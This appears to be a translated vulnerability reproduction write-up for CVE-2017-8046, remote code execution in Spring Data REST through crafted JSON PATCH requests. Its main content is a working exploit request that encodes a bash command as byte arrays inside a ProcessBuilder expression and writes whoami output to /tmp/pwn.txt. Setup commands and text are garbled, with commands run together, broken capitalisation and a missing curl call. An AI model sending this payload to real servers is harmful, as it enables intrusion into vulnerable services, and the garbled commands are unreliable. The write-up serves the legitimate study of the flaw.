Malicious patch requests are submitted to the Spring-data-rest service using carefully constructed JSON data to execute arbitrary Java code
1. Background
Spring data Rest is part of the spring Data project and makes it easy to build a hyper-media-driven rest Web service on top of the spring data repository. Malicious patch requests are submitted to the Spring-data-rest service using carefully constructed JSON data to execute arbitrary Java code
2. Scope of impact
Spring data rest versions prior to 2.5.12, 2.6.7, 3.0 RC3 can view the version of the Spring-data-rest-webmvc jar package to determine the version of Spring data rest
3. Local replication of vulnerabilities
MVN installation
CD/optwget http://apache.mirror.gtcomm.net/maven/maven-3/3.5.0/binaries/ Apache-maven-3.5.0-bin.zipUnzip apache-maven-3.5. 0-bin. Zip ~/. Bash_profile#path=/opt/apache-maven-3.5. 0/-V
Start the Web service
wget https://github.com/spring-projects/spring-data-examples/archive/master.zip Unzip Master. Zip CD Spring-data-examples-master/rest/multi-storemvn Spring-boot:run
Add data
" Content-type:application/json " ' {"FirstName": "Greg", "LastName": "Turnquist"} ' http://localhost:8080/persons
Remote Code Execution
The request method is PATCH
, Content-Type
forapplication/json-patch+json
",". Join (Map (str, (Map (ord, "WhoAmI >/tmp/pwn.txt")))
patch/persons/1http/1.1Host:192.168.1.108:8080Accept:/Accept-Language:enuser-agent:mozilla/5.0(Compatible; MSIE9.0; Windows NT6.1; Win64; x64; trident/5.0) Connection:closecontent-type:application/json-Patch+jsoncontent-length:325[{ "op":"Replace","Path":"(New Java.lang.ProcessBuilder new java.lang.String (New byte[]{47,117,115,114,47,98,105,110,47,98,97,115,104}) , New java.lang.String (New byte[]{45,99}), New java.lang.String (New byte[]{ 119,104,111,97,109,105,32,62,32,47,116,109,112,47,112,119,110,46,116,120,116})). Start (). x","value":"Zhang"}]
The/tmp/pwn.txt file is generated
4. Reference
Https://mp.weixin.qq.com/s/uTiWDsPKEjTkN6z9QNLtSA
Https://github.com/spring-projects/spring-data-examples/tree/master/rest/multi-store
Spring Data REST patch request Remote Code Execution vulnerability case (cve-2017-8046)